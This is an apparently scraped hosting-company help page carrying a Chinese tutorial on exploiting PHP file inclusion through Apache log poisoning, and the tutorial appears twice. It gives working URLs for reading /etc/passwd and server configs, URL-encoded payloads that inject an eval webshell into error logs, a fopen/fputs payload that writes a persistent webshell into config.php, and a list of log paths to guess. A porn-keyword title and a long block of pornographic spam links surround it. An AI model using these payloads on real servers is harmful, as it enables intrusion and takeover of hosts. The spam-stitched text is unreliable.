a毛片毛费观看-a毛片在线-a毛片在线观看-a毛片在线免费观看-国产成人综合洲欧美在线-国产成人综合高清在线观看

始創于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
您的位置: 網站首頁 > 幫助中心>文章內容

黑客滲透linux下載備份取shell

發布時間:  2012/8/15 17:52:35

關于php包含Apache日志的利用,其實也就是利用提交的網址里有php語句,然后再被Apache服務器的日志記錄,然后php再去包含執行,從而包含了去執行。當然,這種辦法最大的弊端是Apache日志肯定會過大,回應的時候當然會超時什么的,所以也是受條件限制的。全當一種研究算了。下面是我的測試過程,我覺得很有意思,你也看看。
比如說,在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
以下是引用片段:
<? include($zizzy); ?>   //包含變量$zizzy


你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語句來查看一些系統環境和密碼檔文件。

那么關于日志包含下面我們來看:
比如我們的Apache的服務器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來包含一下httpd.conf,來看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息,這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數據日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來,只不過文件會很大,那也沒意思測試下去了,那怎么利用呢。

比如我們提交要提交這句,<?phpinfo();?> //查看php的相關信息
在這里,我們只能提交URL編碼模式,因為我在測試中發現,<?的標記并不被記錄,只有轉換成URL編碼提交才會被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉換過了的<?phpinfo();?>,我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會報出錯找不到頁面,而一出錯就被記在錯誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個日志文件就被包含成了phpinfo的信息,而回顯也就成了一個顯示php信息的頁面。


如果可以的話(能夠執行系統命令,也就是safe_mode開著的時候),
這樣子也不錯,
<?system("ls+-la+/home");?>   //執行命令列出home下的文件列表,記得轉換為URL格式哦。

/home/
total 9
-rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
-rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
-rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
-rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
-rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
-rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
-rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>,
這樣轉換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

因為上面那個很不實際,我在測試中發現日志動不動就是幾十兆,那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用,也比上面那種慢的要死好很多。

比如還是這句一句話木馬
<?eval($_POST[cmd]);?>  

到這里你也許就想到了,這是個很不錯的辦法。接著看,如何寫入就成了個問題,用這句,
fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件,然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務端語句。連起來表達成php語句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里寫入一句木馬語句

我們提交這句,再讓Apache記錄到錯誤日志里,再包含就成功寫入shell,記得一定要轉換成URL格式才成功。
轉換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。
我們再來包含日志,提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了,config.php里就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個就成了我們的webshell
直接用lanker的客戶端一連,主機就是你的了。

PS:上面講的,前提是文件夾權限必須可寫 ,一定要-rwxrwxrwx(777)才能繼續,這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑,你可以去猜,也可以參照這里。
附:收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log     
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

關于php包含Apache日志的利用,其實也就是利用提交的網址里有php語句,然后再被Apache服務器的日志記錄,然后php再去包含執行,從而包含了去執行。當然,這種辦法最大的弊端是Apache日志肯定會過大,回應的時候當然會超時什么的,所以也是受條件限制的。全當一種研究算了。下面是我的測試過程,我覺得很有意思,你也看看。
比如說,在一個php存在包含漏洞就像這樣,存在一句php包含漏洞的語句
以下是引用片段:
<? include($zizzy); ?>   //包含變量$zizzy


你可以
http://xxx.com/z.php?zizzy=/etc/inetd.conf
http://xxx.com/z.php?zizzy=/proc/cpuinfo
http://xxx.com/z.php?zizzy=/etc/passwd

就可以利用包含語句來查看一些系統環境和密碼檔文件。

那么關于日志包含下面我們來看:
比如我們的Apache的服務器配置文件位置在這里
/usr/local/apache/conf/httpd.conf
那么我們來包含一下httpd.conf,來看下路徑信息什么的
http://xxx.com/z.php?zizzy=/usr/local/apache/conf/httpd.conf

讀出Apache的配置信息,這里列出部分信息。
<VirtualHost 218.63.89.2>
User #3
Group silver
ServerAdmin webmaster@xxx.com
DocumentRoot /home/virtual/www.xxx.com
ServerName www.xxx.com
ServerAlias xxx.com
ErrorLog /home/virtual/www.xxx.com/logs/www-error_log
CustomLog /home/virtual/www.xxx.com/logs/www-access_log common
ScriptAlias /cgi-bin/ /home/virtual/www.xxx.com/cgi-bin/
Alias /icons/ /home/virtual/www.xxx.com/icons
</VirtualHost>

而我們提交http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
就可以讀出Apache的錯誤日志記錄

[Mon Jan 22 14:01:16 2005] [error] [client 218.63.194.76] File does not
exist: /home/virtual/www.xxx.com/hack.php
[Tus Jan 22 19:36:54 2005] [error] [client 218.63.148.38] File does not
exist: /home/virtual/www.xxx.com/111111111.php
[Wen Jan 23 05:14:54 2005] [error] [client 218.63.235.129] File does not
exist: /home/virtual/www.xxx.com/22222.php3
[Wen Jan 23 16:25:04 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/forum
[Fir Jan 26 19:43:45 2005] [error] [client 218.63.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/blog
[Fir Jan 26 19:43:46 2005] [error] [client 64.229.232.73] attempt to invoke
directory as script: /home/virtual/www.xxx.com/kkkkkkkk

而數據日志/home/virtual/www.xxx.com/logs/www-access_log也是一樣的,一樣可以讀出來,只不過文件會很大,那也沒意思測試下去了,那怎么利用呢。

比如我們提交要提交這句,<?phpinfo();?> //查看php的相關信息
在這里,我們只能提交URL編碼模式,因為我在測試中發現,<?的標記并不被記錄,只有轉換成URL編碼提交才會被完整記錄。

在這里%3C%3Fphpinfo%28%29%3B%3F%3E這句就是轉換過了的<?phpinfo();?>,我們提交
http://www.xxx.com/%3C%3Fphpinfo%28%29%3B%3F%3E

這樣肯定會報出錯找不到頁面,而一出錯就被記在錯誤日志里了
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log
這樣這個日志文件就被包含成了phpinfo的信息,而回顯也就成了一個顯示php信息的頁面。


如果可以的話(能夠執行系統命令,也就是safe_mode開著的時候),
這樣子也不錯,
<?system("ls+-la+/home");?>   //執行命令列出home下的文件列表,記得轉換為URL格式哦。

/home/
total 9
-rw-r--r--   1 www.xxx.com   silver       55 Jan 20 23:01 about.php
drwxrwxrwx   4 www.xxx.com   silver     4096 Jan 21 06:07 abc
-rw-r--r--   1 www.xxx.com   silver     1438 Dec 3 07:39 index.php
-rwxrwxrwx   1 www.xxx.com   silver     5709 Jan 21 20:05 show.php  
-rw-r--r--   1 www.xxx.com   silver     5936 Jan 18 01:37 admin.php
-rwxrwxrwx   1 www.xxx.com   silver     5183 Jan 18 15:30 config.php3
-rw-rw-rw-   1 www.xxx.com   silver   102229 Jan 21 23:18 info.txt
drwxr-xr-x   2 www.xxx.com   silver     4096 Jan 8 16:03 backup
-rw-r--r--   1 www.xxx.com   silver     7024 Dec 4 03:07 test.php

這樣就列出了home下的文件
或者直接一句話木馬<?eval($_POST[cmd]);?>,
這樣轉換后就是%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E 這樣的格式。
我們提交
http://www.xxx.com/%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E

因為上面那個很不實際,我在測試中發現日志動不動就是幾十兆,那樣玩起來也沒意思了。下面想的再深入一點也就是我們寫入一個很實際的webshell來用,也比上面那種慢的要死好很多。

比如還是這句一句話木馬
<?eval($_POST[cmd]);?>  

到這里你也許就想到了,這是個很不錯的辦法。接著看,如何寫入就成了個問題,用這句,
fopen打開/home/virtual/www.xxx.com/forum/config.php這個文件,然后寫入<?eval($_POST[cmd]);?>這個一句話木馬服務端語句。連起來表達成php語句就是

<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
fclose($fp);?>   //在config.php里寫入一句木馬語句

我們提交這句,再讓Apache記錄到錯誤日志里,再包含就成功寫入shell,記得一定要轉換成URL格式才成功。
轉換為
%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
fclose%28%24fp%29%3B%3F%3E
我們提交
http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E

這樣就錯誤日志里就記錄下了這行寫入webshell的代碼。
我們再來包含日志,提交
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log

這樣webshell就寫入成功了,config.php里就寫入一句木馬語句
OK.
http://www.xxx.com/forum/config.php這個就成了我們的webshell
直接用lanker的客戶端一連,主機就是你的了。

PS:上面講的,前提是文件夾權限必須可寫 ,一定要-rwxrwxrwx(777)才能繼續,這里直接用上面列出的目錄來查看。上面講的都是在知道日志路徑的情況下的利用

其他的日志路徑,你可以去猜,也可以參照這里。
附:收集的一些日志路徑
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/error_log
/var/log/httpd/access_log     
/var/log/httpd/error_log    
../apache/logs/error.log    
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/access_log
/var/www/logs/error_log
/var/www/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/access_log
/var/log/error_log

億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.ibaoshan.net】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區翠竹街1號總部企業基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    一二三四免费观看高清在线| 黑鬼吊太大少妇尖叫| 亚洲AV永久中文无码精品| 女人下边被添全过视频| 国产成人无码久久久精品一| 亚洲男人第一AV天堂| 人妻AV中文字幕无码专区| 好吊妞国产欧美日韩免费观看 | 野花社区WWW官网在线观看| 日韩在线一区二区三区| 久本草在线中文字幕| 草草CCYY免费看片线路| 亚洲日韩AV无码中文| 日韩欧美亚洲国产精品字幕久久久| 娇妻丁字裤公交车被在线观看| 爱丫爱丫在线影院| 亚洲欧美日韩国产精品一区二区| 国产午夜手机精彩视频| 18禁超污无遮挡无码免费游戏 | 9420高清完整版在线观看| 日韩AV无码一区二区| 精品无码久久久久久久久水蜜桃 | 私はあなたを爱しています怎么读| 久久久久琪琪去精品色无码| 国产AⅤ无码一区二区三区| 无码人妻精品一二三区免费| 免费中国帅气体育生GARY | 久久天天躁夜夜躁狠狠| 国产AV高潮社区| 中文字幕丰满乱子无码视频| 无码国产精成人午夜视频不卡| 奶头大他一口都含不住| 国产日韩AV无码免费一区二区三 | 久久精品国产亚洲AV香蕉| 公交车伦流澡到高潮HNP| 在线看AV片的网站| 新JAPANESEVIDEO乱| 欧美性战A久久久久久| 国产精品视频第一区二区三区| 7M精品福利视频导航| 亚洲AV永久无码精品水牛影视| 日本适合十八岁以上人群的护肤品 | 精品久久久久久中文墓无码| 东北大坑续集1至60| 在人间电影在线观看完整版| 性中国妓女毛茸茸视频| 人人妻人人澡人人爽人人正品| 久久精品饰品有限公司网站| 国产成人精品久久综合| 99久久人妻精品免费二区| 亚洲精品人妻无码| 他扒开内裤把舌头进去会有影响吗 | 日韩人妻潮喷中文在线视频| 久热中文字幕无码视频| 国产情侣疯狂作爱系列| 波多野结衣放荡的护士| 永久939W79W99W乳液| 亚洲∧V久久久无码精品 | 日本三级黄色视频| 麻豆果冻精东九一传媒MV| 国产午夜手机精彩视频| 城中村快餐嫖老妇对白| 中文字幕亚洲综合久久综合| 亚洲AV中文无码乱人伦在线观看 | 亚洲AV伊人久久青青草原| 日韩欧美精品有码在线| 美女啪啪网站又黄又免费| 大明荫蒂女人毛茸茸| 在线播放国产不卡免费视频| 亚洲AV毛片一区二区三区| 女生自己动手奖励自己的好处| 经典精品毛片免费观看| 国产96在线 | 国产| JAVA强行VIDEOS| 一本一道AV中文字幕无码| 性生大片免费观看网站| 撒尿BBWBBW| 欧美大肚子孕妇疯狂作爱视频| 久久精品久久电影免费| 国产无套乱子伦精彩是白视频| ⅩXXX张柏芝XXXX| 亚洲色成人网站WWW永久下载| 无码人妻丰满熟妇区五十路在线| 日本极品少妇XXXXⅩOOO| 蜜桃av无码一区二区三区| 精品露脸国产偷人在视频| 国产黄A三级三级三级| 边摸边吃奶边做爽视频免费| 18禁自慰网址进入| 亚洲欧美性爱视频| 无套内谢的新婚少妇国语播放| 日本乱人伦AⅤ精品| 毛片一区二区三区| 精品一区二区三区免费毛片爱| 国产精品免费一区二区三区四区 | 人妻少妇一级毛片内射一牛影视| 老师黑色双开真丝旗袍恩施MBA| 黑人与亚洲美女ⅩXXX| 国产精华最好的产品有哪些| 把佛珠一个一个挤出去| 18禁裸男晨勃露J毛免费观看 | 黑人大荫蒂老太大| 国产成人无码一二三区视频| 波多野结衣AV一区二区三区中文 | 人妻在线一区二区| 精品香蕉99久久久久成人网站| 国产免费无码一区二区| 成人一区二区三区视频在线观看| 亚洲色偷无码一区二区蜜桃AV| 性欧美XXXX乳| 天堂8中文在线最新版在线| 欧美日韩精品SUV| 旅游途中夫妻换着玩的说说搞笑| 激情视频传媒一区二区| 成人精品一区二区三区电影| 99成人国产综合久久精品| 小少妇BBBBBBBBBBBB| 日本真人无遮挡啪啪免费| 男人边吃奶边做呻吟免费视频 | 国产成人无码AV在线播放DVD | 未成满18禁止免费无码网站| 日本熟妇人妻XXXXX野外呻| 奶头又大又白喷奶水AV| 久久WWW免费人成一看片| 成 人 黄 色 网 站 视 频| 中文区中文字幕免费看| 亚洲熟妇少妇任你躁在线观看| 性欧美VIDEO高清| 太多了太满了肚子装不下了 | 国产夫妻CCCXXX久久久| 成人午夜福利视频网址| GAY欧美猛男巨大FUCKIN| 中国 韩国 日本 免费看片| 亚洲人成网线在线播放VA| 亚洲AV色香蕉一区二区| 甜性涩爱在线播放| 色视频WWW在线播放国产人成| 久久综合噜噜激激的五月天| 含羞草四叶草三叶草| 国产精品天干天干在线观看| 抖抈短视频APP免费下载| 宝宝又大了1V1| AV在线播放网站| 18禁美女黄网站色大片免费观看 | 欧美一区二区在线视频人妻| 麻豆一区二区三区精品视频| 久久久久久精品成人免费| 狠狠色欧美亚洲狠狠色WWW| 国产精品亚洲成在人线| 国产成人AV无码精品| 波多野结衣系列18部无码观看A| CHINESE国产老熟女| 2023国产精品一卡2卡三卡| 在火车和后妈妈谁在一起是什么书 | 嗯好爽快点插我视频在线播放 | 亚洲国产午夜无码精品小说| 亚洲AV无码蜜臀久久寂寞少妇| 无码熟妇人妻AV在线一| 同性男男黄G片免费网站| 色婷婷久久综合中文久久蜜桃AV| 人妻蜜と1~4中文字幕月野定规| 拧花蒂尿用力按凸起喷水尿AV| 国语对白做受XXXXX在线中国| 国产精品三级一区二区| 国产ZLJZLJZLJZLJ| 斑马视频电影免费观看| 99久久伊人精品综合观看| 2020无码天天喷水天天爽| 真人作爱视频免费网站| 亚洲日韩欧洲乱码AV夜夜摸| 亚洲精品1卡2卡三卡23卡放| 午夜理论片免费播放| 四虎国产精品永久免费网址| 色综合热无码热国产| 色欲香天天天综合网站无码| 日本十八禁免费看污网站| 奇米精品视频一区二区三区| 欧美叉叉叉BBB网站| 男生把手放进我内裤揉摸好爽| 免费观看的国产大片APP下载| 蜜臀国产AV天堂久久无码蜜臀 | 极品YIN荡人妻合集H| 激情偷乱人伦小说视频| 黑人高潮拔也拔不出来| 国产免费看MV大片的软件| 国产精品久久久久久久久免费蜜桃| 51CG今日吃瓜热门大瓜| 69国产成人综合久久精品| 51国偷自产一区二区三区| 91人妻超碰亚洲| 99国精产品灬源码168| 中国鲜肉GAY高中XX禁18网| 做AJ的姿势教程大全图片高清版| 50岁露脸老熟女88AV| 91精品人妻一区二区| CHINESE东北体育生自慰| JIZZ成熟丰满韩国女人.| 办公室撕开奶罩吮奶在线观看 | 黑人xxx欧美性爱| 精品国产黑色丝袜高跟鞋|